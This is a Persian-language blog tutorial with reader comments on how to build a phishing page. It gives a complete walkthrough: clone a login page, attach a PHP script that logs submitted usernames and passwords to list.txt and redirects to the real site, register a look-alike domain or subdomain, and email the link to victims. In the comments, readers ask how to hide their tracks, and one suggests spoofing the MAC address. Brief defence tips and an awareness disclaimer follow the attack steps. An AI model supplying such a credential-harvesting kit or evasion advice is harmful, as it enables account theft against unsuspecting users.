یکی از رایجترین روشهای سرقت اطلاعات به خصوص رمزعبور، حملات فیشینگ با ساخت صفحه جعلی است. خرابکاران در حملات فیشینگ صفحاتی همانند صفحه وبسایت هدف میسازند و کاربران را ترغیب به login کردن در حسابهایشان میکنند.
در این مطلب آموشی میخوانیم که چگونه میتوان صفحه فیشینگ یا جعلی ساخت و از چه راههایی میتوانیم از خودمان در برابر حملات فیشینگ محافظت کنیم.
[box type=”info”]توجه داشته باشید این نوع از آموزشها در وبسایت کنشتک صرفا به منظور نشان دادن راه و روش و ابزارهایی است که برخی با سواستفاده از آنها، امنیت و حریم شخصی کاربران دیگر را تهدید میکنند. ما معتقدیم با بالا بردن آگاهی و دانش است که کاربران در صدد حفظ امنیت خود برمیآیند.[/box]
ساخت صفحه جعلی یا صفحه فیشینگ
برای جعل یک صفحه وبسایت کافی است :
- وبسایت مورد نظر را در مرورگر باز کنید.
- سپس از منوی مرورگر و یا کلیک راست روی آن صفحه، گزینه Save as را کلیک کنید.
- مطمئن شوید که نوع فایل Html Only باشد. زیرا به فایلهای جاوا اسکریپت و غیره نیازی نداریم. تمام عکسها بصورت لینک از خود وبسایت اصلی خوانده میشوند. (این روش سادهترین راه است. در نظر داشته باشید که با این روش احتمال شناسایی وبسایت جعلی توسط مدیران وبسایت اصلی امکان پذیر است.)
- بعد از ذخیره میتوانید فایل Html مورد نظر را روی مرورگر باز کنید. دقیقا همان صفحه را خواهید دید غیر از آنکه آدرس وبسایت از دستگاه شما است.
- مطمئن شوید که نام فایل را به index تغییر داده باشید. به این ترتیب فایل شما index.html خواهد بود.
- در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
- در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.
-
<?php Header("Location: http://www.TargetDomain.com"); $handle = fopen("list.txt", "a"); foreach($_GET as $variable => $value) { fwrite ($handle, $variable); fwrite ($handle, $value); fwrite ($handle, "\r\n"); } fwrite ($handle, "\r\n"); fclose($handle); exit; ?> - این فایل php که همان فایل phishing است را به هر اسمی غیر از phish یا phishing ذخیره کنید. برای نمونه sample.php.
- نوبت فایل index.html است. آن را در ویرایشگری مانند notepad++ باز کنید.
- در کدهای این فایل تگ form را پیدا کنید. میتوانید به کمک دکمههای میانبر Ctrl + F ابزار جستجو را باز کنید و form را پیدا کنید.
- در تگ form، پارامتر action را خواهید دید. Action میگوید که اطلاعات فرم به کدام صفحه ارسال شوند. تنها کاری که باید انجام دهید، جایگزین کردن مسیر داخل دابل کوتیشن Action با نام فایل php تان است. action=”sample.php”
- داخل تگ فرم پارامتر method را پیدا کنید. Method می گوید که اطلاعات چگونه ارسال شوند. دو گزینه برای این پارامتر وجود دارند یکی POST و دیگری GET. در ارسال با POST اطلاعات فرم در بدنه HTTP Request فرستاده میشوند و امنیت این روش بالا است. اما در روش GET اطلاعات فرم در URL ارسال میشوند. مطمئن شوید که گزینه GET را برای پارامتر Method انتخاب کرده باشید.
- فایل را ذخیره کنید.
- در این مرحله نیاز به یک دامنه و یک هاست دارید.
- بعد از خرید دامنه و هاست، dnsهای دامنه را به Name Server هاست تغییر دهید.
- با استفاده از FTP، SFTP یا کنترل پنلهای موجود، فایلهایتان را روی هاستتان آپلود کنید.
کافی است نام دامنه ثبت شده شما نزدیک به دامنه وبسایت هدف باشد یا از سرویسهای کوتاه کننده لینک استفاده کنید. همچنین میتوانید در دامنه خودتان یک Sub Damian به نام دامنه وبسایت هدف بسازید تا صفحه جعلی شما در آن آدرس باز شود. برای مثال وبسایت هدف http://www.examlpe.com است و دامنه ثبت شما sample.com میباشد. میتوانید یکSub Damian با نام ex بسازید و مسیر فایلهای آپلود شده را به آن متصل کنید. در اینصورت صفحه جعلی شما در آدرس ex.sample.com نمایش داده میشود.
تمام شد. تنها کاری که باید انجام دهید ارسال لینک صفحه جعلی به ایمیل کاربران دیگر و درخواست از آنها برای ورد به حساب کاربریشان است. اگر کاربری اطلاعات خود را از طریق صفحه فیشینگ شما ارسال کند، آن اطلاعات در فایل list.txt ذخیره میشوند.
چگونه از حملات فیشینگ در امان بمانیم؟
- هرگز تکرار میکنیم هرگز به ایمیلهایی که از شما به ترفندهای مختلف درخواست میکنند وارد حسابهایتان شوید توجه نکنید.
- هنگامی که میخواهید وارد حسابهایتان شوید به آدرس صفحه دقت کنید تا به اشتباه گرفتار صفحه جعلی نشوید.
- اگر به اشتباه اطلاعات خود را در صفحه جعلی وارد کرده اید به سرعت وارد حسابتان شوید و رمزعبور را تغییر دهید. اگر رمزعبور شما تغییر پیدا کرده است آن را ریکاوری کنید. اگر این مورد هم بی نتیجه ماند، سریعا با پشتیبانی آن سرویس تماس بگیرید و موضوع را توضیح دهید.
- ایمیلهای فیشینگی که برایتان ارسال میشوند ممکن است دقیقا به فرمت ایمیل سرویس مورد نظر باشد. اگر لازم است وارد حسابتان شوید به جای کلیک بر روی لینکهای ایمیل، مستقیم وارد حسابتان شوید.
- حتما گزینه احراز هویت دو عامله حسابهای آنلاینتان را فعال کنید.
حالا شما میدانید در پشت پرده حملات فیشینگ چه میگذرد و آنها چگونه اطلاعات کاربران را به سرقت میبرند. از دانش و آگاهیتان برای بالا بردن امنیت خود و اطرافیان استفاده کنید.
[…] حملات فیشینگ انجام دهد […]
[…] دیجیتال این هفته کنشتک میبینیم که از آمدن یک ایمیل فیشینگ تا فیلتر شدن یا پاسخ دادن آن توسط کاربر چه اتفاقهایی […]
[…] خودکار وارد صفحه مورد نظر هکر شود. این صفحه هم معمولا صفحه فیشینگ یا آلوده به بدافزار […]
[…] جعلی یا ایمیل جعلی استفاده میشود را فیشینگ میگویند. ساخت وبسایت فیشینگ هم کار سخت و پیچیدهای نیست، بنابراین بسیار محتاط […]
[…] حمله فیشینگ […]
[…] به جای Yahoo.com ممکن است Yah00.com نوشته شده باشد، تا شما وارد وبسایت جعلی شوید (فیشینگ) و اطلاعات مهمی مانند نام کاربری، […]
[…] کاربر بدافزار دانلود شود. نوع دیگری از این حمله ساخت صفحه وب جعلی است، طوریکه ظاهر آن کاملا با وبسایت اصلی یکسان ولی […]
[…] حمله فیشینگ هدف بدست آوردن اطلاعات مهم و حساس مانند رمزعبور، نام […]
[…] از راههای حمله فیشینگ، ایجاد صفحه جعلی و آدرس وبسایتی مشابه آدرس واقعی وبسایت مورد نظر […]
[…] به کلیک روی لینک خاصی کنند. بنابراین حتما باید بدانید حمله فیشینگ چگونه کار میکند، راههای تشخیص حمله فیشینگ کدامند تا قربانی این حملات […]
در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.
سلام ممنونم بابت سایتون من این قسمت رو متوجه نمیشم میشه راهنمایی کنید
سلام
دو فایل ایجاد میکنید، یکی از نوع txt و یکی php. فایل txt برای ذخیره اطلاعاتی است که کاربر به اشتباه وارد میکند. فایل php همان فایل فیشینگ است که در ادامه همان پاراگراف کد آن را میبینید.
سلام،ضمن تشکر از سایت خوبتون بنده هم این قسمتشو متوجه نشدم،ممکنه راهنمایی کنید؟
سلام
دو فایل ایجاد میکنید، یکی از نوع txt و یکی php. فایل txt برای ذخیره اطلاعاتی است که کاربر به اشتباه وارد میکند. فایل php همان فایل فیشینگ است که در ادامه همان پاراگراف کد آن را میبینید.
سلام خسته نباشید ، چه جور هاست و دامین نیاز داریم ؟ چقدر حجم داشته باشه ؟میشه راهنمایی کنید ممنون ❤️
سلام
در این آموزش فقط خواستیم نشان بدهیم که چقدر ساده میتواند صفحه فیشینگ ساخت. این راهنمای قدم به قدم ساخت صفحه فیشینگ و حمله فیشینگ نیست.
سلام
مفید بود
ولی میشه ی راهنماییم بکنی ؟
اومدیم و من fake page رو ساختم و روی یک هاست آپلود کردم و فیشینگ رو انجام دادم
چجوری ردپای خودمو پاک کنم
مثلا آی پی و مک آدرسی که روی هاست ذخیره میشه و …
سلام
متشکریم.
هدف این مقاله نشان دادن سادگی ساختن صفحات جعلی برای حمله فیشینگ است، نه راهنمایی حمله فیشینگ موفق.
سلام شما می تونید قبل از ساخت این fake page با استفاده از برنامه چینج مک ادرس مک اپیتونو تغییر داده و رد پایی جا نگزارید
سلام من خوب متوجه نشدم میشه فیلم از انجام این کارو بزارید ممنون
[…] فیشینگ در دنیای اینترنت به معنی تقلب کردن معنی میدهد. در مورد ایمیل هنگامی که ارسال کننده کاربر را فریب میدهد که از طرف بانک ایمیلی را ارسال میکند، و یا ایمیل شامل لینکی است که کاربر را به وبسایت جعلی هدایت میکند میگوییم حمله فیشینگ رخ داده است. برای مثال ایمیلی دریافت میکنید که مدعی است از طرف بانک شماست و شامل لینکی برای ورود به حساب بانکیتان است. شما روی لینک کلیک میکنید و وارد وبسایتی کاملا شبیه وبسایت اصلی بانکتان میشوید. اگر به آدرس وبسایت دقت نکنید، احتمالا اطلاعات ورود به حساب بانکیتان را وارد میکنید. اتفاقی که میافتد این است : خرابکار اطلاعات وورد به حساب بانکی شما را ثبت میکند، اگر باهوش باشد بعد از اینکه شما روی دکمه ورود کلیک کردید شما را به وبسایت اصلی بانکتان هدایت میکند. […]
سلام چجوری به index تغیرش بدم وچجوری بهش اضافه کنم؟
ُا این برنامه چیه ؟؟ که این تگ ها رو داخلش زدین هم برای طراحی سایت هست
افزونه وردپرس است.
وقتی هنوز نمیدونی چرا اومدی درمورد فیشینگ بحث میکنی . اول یاد بگیر بعد ، دوما فیشینگ دزدی حساب میشه و هرگز اجنجام نده ، فقط جهت بالا بردن تواناییت در برنامه نویسی پی اچ پی و اینا
سلام من تگ form رو پیدانکردم
سلام
ممکن است اطلاعات را از طریق جاوااسکریپت ارسال کند، در فایلهای جاوا اسکریپت جستجو کنید.